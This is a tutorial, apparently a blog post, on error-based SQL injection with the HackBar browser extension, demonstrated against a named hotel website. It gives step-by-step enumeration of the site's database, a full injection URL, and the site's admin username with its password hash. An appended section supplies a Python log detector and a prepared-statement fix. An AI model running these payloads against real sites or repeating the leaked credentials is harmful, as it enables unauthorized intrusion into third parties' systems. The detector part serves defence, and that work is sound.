Error Based SQL Injection
We mainly use error-based SQL injection when manual SQL injection or a WAF bypass does not give us access to a website's admin data.
I recommend using the Firefox HackBar extension for error-based SQL injection. HackBar has a menu called ERROR/DOUBLE, which makes the error-based SQL injection procedure easier.
Our target site is: http://www.embryohotel.com/room-detail.php?id=11
Step 1: First add a single quote (') to the parameter to check whether the site is vulnerable. My target site is vulnerable because, with the quote added, the content of the page changes and it shows some message.
Step 2: Now, following manual SQL injection or union-based SQL injection, try to find a vulnerable column. On my target site, it shows an error message.
Step 3: Let's try a WAF bypass. On my target site that also does not work, so we need to use error-based SQL injection.
Step 4: We need to find the database name, so follow this menu path in the Firefox HackBar extension:
ERROR/DOUBLE -> Error Based -> Get Database
We get the Database name: cp227754_embryohotel_db
Step 5: Find the admin/required table, so follow this menu path in the Firefox HackBar extension:
ERROR/DOUBLE -> Error Based -> Get Tables
We get the Table name: admin
Step 6: Find the columns, so follow this menu path in the Firefox HackBar extension:
ERROR/DOUBLE -> Error Based -> Get Columns
We get the Column name: username, password
Note: if there are multiple columns, change the limit and re-run; it will then show the other columns. For example:
http://www.embryohotel.com/room-detail.php?id=-11+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e+AND+table_schema=0x63703232373735345f656d6272796f686f74656c5f6462+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) — —
Increment the limit: 1, 2, 3, 4, ...
Step 7: Now get the data from these two columns (username, password), so follow this menu path in the Firefox HackBar extension:
ERROR/DOUBLE -> Error Based -> XPATH EXTRACTVALUE -> Get Data
We get the admin username and password (hashed):
admin => e742c63f03ab602f2b38433ffc
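Seen from the defender's side, the requests generated in steps 4 to 7 leave recognizable markers in the web server access log. The following is an added example, not part of the original post: a small detector for those markers (the FLOOR(RAND(0)*2) double query, EXTRACTVALUE, INFORMATION_SCHEMA enumeration). The function names, the alert rule and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Markers taken from the payload and the HackBar menu names in the post.
SIGNATURES = {
    "double_query": re.compile(r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "xpath_extractvalue": re.compile(r"extractvalue\s*\("),
    "schema_enum": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "hex_literal": re.compile(r"0x[0-9a-f]{8,}"),
    "subselect": re.compile(r"\(\s*select\b"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(query: str) -> str:
    """Decode up to three URL-encoding layers, drop /**/ comments, squeeze spaces."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).lower()

def classify(log_line: str) -> list[str]:
    """Return the sorted names of the signatures found in the request's query string."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = normalize(urlsplit(match.group(1)).query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def is_error_based_probe(log_line: str) -> bool:
    """Alert when an error-forcing primitive appears together with a sub-select."""
    hits = set(classify(log_line))
    return bool(hits & {"double_query", "xpath_extractvalue"}) and "subselect" in hits

# Constructed sample lines (documentation IP address, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /room-detail.php?id=11 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /room-detail.php?id=-11+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT+column_name+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) HTTP/1.1" 200 412',
    '198.51.100.4 - - [01/Jan/2024:10:02:30 +0000] "GET /search.php?q=select+a+room+(2+adults) HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(is_error_based_probe(line), classify(line))
```

Such a rule only reports attempts; the underlying fix is to bind the id parameter in a prepared statement and to stop returning database error text to the client.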
Happy Hacking